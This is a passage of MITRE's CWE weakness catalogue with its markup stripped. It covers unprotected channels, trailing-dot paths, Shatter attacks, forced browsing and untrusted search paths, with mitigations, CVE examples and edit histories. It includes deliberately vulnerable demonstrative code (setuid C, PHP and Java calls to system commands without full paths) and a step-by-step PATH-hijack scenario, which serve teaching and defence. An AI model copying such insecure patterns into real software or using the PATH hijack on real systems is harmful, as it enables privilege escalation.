2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-09-27 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Alternate_Terms, Common_Consequences, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + Anonymous External Contributor + 2022-06-28 + Suggested rephrase for extended description + + + + + The product uses a primary channel for administration or restricted functionality, but it does not properly protect the channel. + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + + + Access Control + Gain Privileges or Assume Identity + Bypass Protection Mechanism + + + + + Architecture and Design + Do not expose administrative functionnality on the user UI. + + + Architecture and Design + Protect the administrative/restricted functionality with a strong authentication mechanism. + + + + + Unprotected Primary Channel + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product accepts path input in the form of trailing dot ('filedir.') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + CVE-2000-1114 + Source code disclosure using trailing dot + https://www.cve.org/CVERecord?id=CVE-2000-1114 + + + CVE-2002-1986 + Source code disclosure using trailing dot + https://www.cve.org/CVERecord?id=CVE-2002-1986 + + + CVE-2004-2213 + Source code disclosure using trailing dot + https://www.cve.org/CVERecord?id=CVE-2004-2213 + + + CVE-2005-3293 + Source code disclosure using trailing dot + https://www.cve.org/CVERecord?id=CVE-2005-3293 + + + CVE-2004-0061 + Bypass directory access restrictions using trailing dot in URL + https://www.cve.org/CVERecord?id=CVE-2004-0061 + + + CVE-2000-1133 + Bypass directory access restrictions using trailing dot in URL + https://www.cve.org/CVERecord?id=CVE-2000-1133 + + + CVE-2001-1386 + Bypass check for ".lnk" extension using ".lnk." + https://www.cve.org/CVERecord?id=CVE-2001-1386 + + + + + Trailing Dot - 'filedir.' + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Trailing Dot - 'filedir.' + + + + The product protects a primary channel, but it does not use the same level of protection for an alternate channel. + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + Operation + + + + + Access Control + Gain Privileges or Assume Identity + Bypass Protection Mechanism + + + + + Architecture and Design + Identify all alternate channels and use the same protection mechanisms that are used for the primary channels. + + + + + CVE-2002-0567 + DB server assumes that local clients have performed authentication, allowing attacker to directly connect to a process to load libraries and execute commands; a socket interface also exists (another alternate channel), so attack can be remote. + https://www.cve.org/CVERecord?id=CVE-2002-0567 + + + CVE-2002-1578 + Product does not restrict access to underlying database, so attacker can bypass restrictions by directly querying the database. + https://www.cve.org/CVERecord?id=CVE-2002-1578 + + + CVE-2003-1035 + User can avoid lockouts by using an API instead of the GUI to conduct brute force password guessing. + https://www.cve.org/CVERecord?id=CVE-2003-1035 + + + CVE-2002-1863 + FTP service can not be disabled even when other access controls would require it. + https://www.cve.org/CVERecord?id=CVE-2002-1863 + + + CVE-2002-0066 + Windows named pipe created without authentication/access control, allowing configuration modification. + https://www.cve.org/CVERecord?id=CVE-2002-0066 + + + CVE-2004-1461 + Router management interface spawns a separate TCP connection after authentication, allowing hijacking by attacker coming from the same IP address. + https://www.cve.org/CVERecord?id=CVE-2004-1461 + + + + + Unprotected Alternate Channel + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This can be primary to authentication errors, and resultant from unhandled error conditions. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product opens an alternate channel to communicate with an authorized user, but the channel is accessible to other actors. + This creates a race condition that allows an attacker to access the channel before the authorized user does. + + + + + + + + + + Architecture and Design + + + + + Access Control + Gain Privileges or Assume Identity + Bypass Protection Mechanism + + + + + CVE-1999-0351 + FTP "Pizza Thief" vulnerability. Attacker can connect to a port that was intended for use by another client. + https://www.cve.org/CVERecord?id=CVE-1999-0351 + + + CVE-2003-0230 + Product creates Windows named pipe during authentication that another attacker can hijack by connecting to it. + https://www.cve.org/CVERecord?id=CVE-2003-0230 + + + + System Process + + + + Alternate Channel Race Condition + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-01-12 + updated References + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Alternate Channel Race Condition + + + + The product does not properly verify the source of a message in the Windows Messaging System while running at elevated privileges, creating an alternate channel through which an attacker can directly send a message to the product. + + + + + + + + + + Architecture and Design + + + + + Access Control + Gain Privileges or Assume Identity + Bypass Protection Mechanism + + + + + Architecture and Design + Always verify and authenticate the source of the message. + + + + + CVE-2002-0971 + Bypass GUI and access restricted dialog box. + https://www.cve.org/CVERecord?id=CVE-2002-0971 + + + CVE-2002-1230 + Gain privileges via Windows message. + https://www.cve.org/CVERecord?id=CVE-2002-1230 + + + CVE-2003-0350 + A control allows a change to a pointer for a callback function using Windows message. + https://www.cve.org/CVERecord?id=CVE-2003-0350 + + + CVE-2003-0908 + Product launches Help functionality while running with raised privileges, allowing command execution using Windows message to access "open file" dialog. + https://www.cve.org/CVERecord?id=CVE-2003-0908 + + + CVE-2004-0213 + Attacker uses Shatter attack to bypass GUI-enforced protection for CVE-2003-0908. + https://www.cve.org/CVERecord?id=CVE-2004-0213 + + + CVE-2004-0207 + User can call certain API functions to modify certain properties of privileged programs. + https://www.cve.org/CVERecord?id=CVE-2004-0207 + + + + System Process + + + + Unprotected Windows Messaging Channel ('Shatter') + + + SFP30 + Missing endpoint authentication + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Overlaps privilege errors and UI errors. + + Possibly under-reported, probably under-studied. It is suspected that a number of publicized vulnerabilities that involve local privilege escalation on Windows systems may be related to Shatter attacks, but they are not labeled as such. + Alternate channel attacks likely exist in other operating systems and messaging models, e.g. in privileged X Windows applications, but examples are not readily available. + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Other_Notes, Relationship_Notes, Research_Gaps + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This entry has been deprecated because it was a duplicate of CWE-441. All content has been transferred to CWE-441. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-05 + deprecated this entry as a duplicate of 441 + + + CWE Content Team + MITRE + 2008-11-24 + updated Applicable_Platforms, Description, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Name + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Proxied Trusted Channel + DEPRECATED (Duplicate): Proxied Trusted Channel + + + + The product does not sufficiently protect all possible paths that a user can take to access restricted functionality or resources. + + + + + + + + + + Architecture and Design + + + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + + + + + Architecture and Design + Deploy different layers of protection to implement security in depth. + + + + + Alternate Path Errors + + + SFP35 + Insecure resource access + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2010-12-13 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Alternate Path Errors + Failure to Protect Alternate Path + + + + The web application does not adequately enforce appropriate authorization on all restricted URLs, scripts, or files. + Web applications susceptible to direct request attacks often make the false assumption that such resources can only be reached through a given navigation path and so only apply authorization at certain points in the path. + + + + + + + + + + + + + + + forced browsing + The "forced browsing" term could be misinterpreted to include weaknesses such as CSRF or XSS, so its use is discouraged. + + + + + Implementation + + + Operation + + + + + Confidentiality + Integrity + Availability + Access Control + Read Application Data + Modify Application Data + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + + + + + Architecture and Design + Operation + Apply appropriate access control authorizations for each access to all restricted URLs, scripts or files. + + + Architecture and Design + Consider using MVC based frameworks such as Struts. + + + + + If forced browsing is possible, an attacker may be able to directly access a sensitive page by entering a URL similar to the following. + + http://somesite.com/someapplication/admin.jsp + + + + + + CVE-2022-29238 + Access-control setting in web-based document collaboration tool is not properly implemented by the code, which prevents listing hidden directories but does not prevent direct requests to files in those directories. + https://www.cve.org/CVERecord?id=CVE-2022-29238 + + + CVE-2022-23607 + Python-based HTTP library did not scope cookies to a particular domain such that "supercookies" could be sent to any domain on redirect. + https://www.cve.org/CVERecord?id=CVE-2022-23607 + + + CVE-2004-2144 + Bypass authentication via direct request. + https://www.cve.org/CVERecord?id=CVE-2004-2144 + + + CVE-2005-1892 + Infinite loop or infoleak triggered by direct requests. + https://www.cve.org/CVERecord?id=CVE-2005-1892 + + + CVE-2004-2257 + Bypass auth/auth via direct request. + https://www.cve.org/CVERecord?id=CVE-2004-2257 + + + CVE-2005-1688 + Direct request leads to infoleak by error. + https://www.cve.org/CVERecord?id=CVE-2005-1688 + + + CVE-2005-1697 + Direct request leads to infoleak by error. + https://www.cve.org/CVERecord?id=CVE-2005-1697 + + + CVE-2005-1698 + Direct request leads to infoleak by error. + https://www.cve.org/CVERecord?id=CVE-2005-1698 + + + CVE-2005-1685 + Authentication bypass via direct request. + https://www.cve.org/CVERecord?id=CVE-2005-1685 + + + CVE-2005-1827 + Authentication bypass via direct request. + https://www.cve.org/CVERecord?id=CVE-2005-1827 + + + CVE-2005-1654 + Authorization bypass using direct request. + https://www.cve.org/CVERecord?id=CVE-2005-1654 + + + CVE-2005-1668 + Access privileged functionality using direct request. + https://www.cve.org/CVERecord?id=CVE-2005-1668 + + + CVE-2002-1798 + Upload arbitrary files via direct request. + https://www.cve.org/CVERecord?id=CVE-2002-1798 + + + + + Direct Request aka 'Forced Browsing' + + + A10 + Failure to Restrict URL Access + CWE More Specific + + + A1 + Unvalidated Input + CWE More Specific + + + A2 + Broken Access Control + CWE More Specific + + + 34 + Predictable Resource Location + + + SFP30 + Missing endpoint authentication + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Overlaps Modification of Assumed-Immutable Data (MAID), authorization errors, container errors; often primary to other weaknesses such as XSS and SQL injection. + "Forced browsing" is a step-based manipulation involving the omission of one or more steps, whose order is assumed to be immutable. The application does not verify that the first step was performed successfully before the second step. The consequence is typically "authentication bypass" or "path disclosure," although it can be primary to all kinds of weaknesses, especially in languages such as PHP, which allow external modification of assumed-immutable variables. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Relationships, Relationship_Notes, Taxonomy_Mappings, Theoretical_Notes + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Applicable_Platforms, Description, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Observed_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Modes_of_Introduction, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product searches for critical resources using an externally-supplied search path that can point to resources that are not under the product's direct control. + + This might allow attackers to execute their own programs, access unauthorized data files, or modify configuration in unexpected ways. If the product uses a search path to locate critical resources such as programs, then an attacker could modify that search path to point to a malicious program, which the targeted product would then execute. The problem extends to any type of critical resource that the product trusts. + Some of the most common variants of untrusted search path are: + + In various UNIX and Linux-based systems, the PATH environment variable may be consulted to locate executable programs, and LD_PRELOAD may be used to locate a separate library. + In various Microsoft-based systems, the PATH environment variable is consulted to locate a DLL, if the DLL is not found in other paths that appear earlier in the search order. + + + + + + + + + + + + + + + + Untrusted Path + + + + + Implementation + + + High + + + Integrity + Confidentiality + Availability + Access Control + Gain Privileges or Assume Identity + Execute Unauthorized Code or Commands + There is the potential for arbitrary code execution with privileges of the vulnerable program. + + + Availability + DoS: Crash, Exit, or Restart + The program could be redirected to the wrong files, potentially triggering a crash or hang when the targeted file is too large or does not have the expected format. + + + Confidentiality + Read Files or Directories + The program could send the output of unauthorized files to the attacker. + + + + + Black Box + + Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. + Attach the monitor to the process and look for library functions and system calls that suggest when a search path is being used. One pattern is when the program performs multiple accesses of the same file but in different directories, with repeated failures until the proper filename is found. Library calls such as getenv() or their equivalent can be checked to see if any path-related variables are being accessed. + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + Manual Analysis + Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + + + Architecture and Design + Implementation + Attack Surface Reduction + Hard-code the search path to a set of known-safe values (such as system directories), or only allow them to be specified by the administrator in a configuration file. Do not allow these settings to be modified by an external party. Be careful to avoid related weaknesses such as CWE-426 and CWE-428. + + + Implementation + When invoking other programs, specify those programs using fully-qualified pathnames. While this is an effective approach, code that uses fully-qualified pathnames might not be portable to other systems that do not use the same pathnames. The portability can be improved by locating the full-qualified paths in a centralized, easily-modifiable location within the source code, and having the code refer to these paths. + + + Implementation + Remove or restrict all environment settings before invoking other programs. This includes the PATH environment variable, LD_LIBRARY_PATH, and other settings that identify the location of code libraries, and any application-specific search paths. + + + Implementation + Check your search path before use and remove any elements that are likely to be unsafe, such as the current working directory or a temporary files directory. + + + Implementation + Use other functions that require explicit paths. Making use of any of the other readily available functions that require explicit paths is a safe way to avoid this problem. For example, system() in C does not require a full path since the shell can take care of it, while execl() and execv() require a full path. + + + + + This program is intended to execute a command that lists the contents of a restricted directory, then performs other actions. Assume that it runs with setuid privileges in order to bypass the permissions check by the operating system. + + #define DIR "/restricted/directory" + char cmd[500];sprintf(cmd, "ls -l %480s", DIR); + /* Raise privileges to those needed for accessing DIR. */ + + RaisePrivileges(...);system(cmd);DropPrivileges(...);... + + This code may look harmless at first, since both the directory and the command are set to fixed values that the attacker can't control. The attacker can only see the contents for DIR, which is the intended program behavior. Finally, the programmer is also careful to limit the code that executes with raised privileges. + However, because the program does not modify the PATH environment variable, the following attack would work: + + + The user sets the PATH to reference a directory under the attacker's control, such as "/my/dir/". + The attacker creates a malicious program called "ls", and puts that program in /my/dir + The user executes the program. + When system() is executed, the shell consults the PATH to find the ls program + The program finds the attacker's malicious program, "/my/dir/ls". It doesn't find "/bin/ls" because PATH does not contain "/bin/". + The program executes the attacker's malicious program with the raised privileges. + + + + + This code prints all of the running processes belonging to the current user. + + + + //assume getCurrentUser() returns a username that is guaranteed to be alphanumeric (avoiding CWE-78) + $userName = getCurrentUser();$command = 'ps aux | grep ' . $userName;system($command); + + If invoked by an unauthorized web user, it is providing a web page of potentially sensitive information on the underlying system, such as command-line arguments (CWE-497). This program is also potentially vulnerable to a PATH based attack (CWE-426), as an attacker may be able to create malicious versions of the ps or grep commands. While the program does not explicitly raise privileges to run the system commands, the PHP interpreter may by default be running with higher privileges than users. + + + The following code is from a web application that allows users access to an interface through which they can update their password on the system. In this environment, user passwords can be managed using the Network Information System (NIS), which is commonly used on UNIX systems. When performing NIS updates, part of the process for updating passwords is to run a make command in the /var/yp directory. Performing NIS updates requires extra privileges. + + ...System.Runtime.getRuntime().exec("make");... + + The problem here is that the program does not specify an absolute path for make and does not clean its environment prior to executing the call to Runtime.exec(). If an attacker can modify the $PATH variable to point to a malicious binary called make and cause the program to be executed in their environment, then the malicious binary will be loaded instead of the one intended. Because of the nature of the application, it runs with the privileges necessary to perform system operations, which means the attacker's make will now be run with these privileges, possibly giving the attacker complete control of the system. + + + + + CVE-1999-1120 + Application relies on its PATH environment variable to find and execute program. + https://www.cve.org/CVERecord?id=CVE-1999-1120 + + + CVE-2008-1810 + Database application relies on its PATH environment variable to find and execute program. + https://www.cve.org/CVERecord?id=CVE-2008-1810 + + + CVE-2007-2027 + Chain: untrusted search path enabling resultant format string by loading malicious internationalization messages. + https://www.cve.org/CVERecord?id=CVE-2007-2027 + + + CVE-2008-3485 + Untrusted search path using malicious .EXE in Windows environment. + https://www.cve.org/CVERecord?id=CVE-2008-3485 + + + CVE-2008-2613 + setuid program allows compromise using path that finds and loads a malicious library. + https://www.cve.org/CVERecord?id=CVE-2008-2613 + + + CVE-2008-1319 + Server allows client to specify the search path, which can be modified to point to a program that the client has uploaded. + https://www.cve.org/CVERecord?id=CVE-2008-1319 + + + + Program Invocation + Code Libraries + + + System Process + + + + Untrusted Search Path + + + Relative path library search + + + ENV03-C + Sanitize the environment when invoking external programs + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Potential_Mitigations, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-12-28 + updated References + + + CWE Content Team + MITRE + 2010-02-16 + updated References, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2010-06-21 + updated Detection_Factors, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-09-27 + updated Description, Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Demonstrative_Examples, References, Relationships, Type + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + 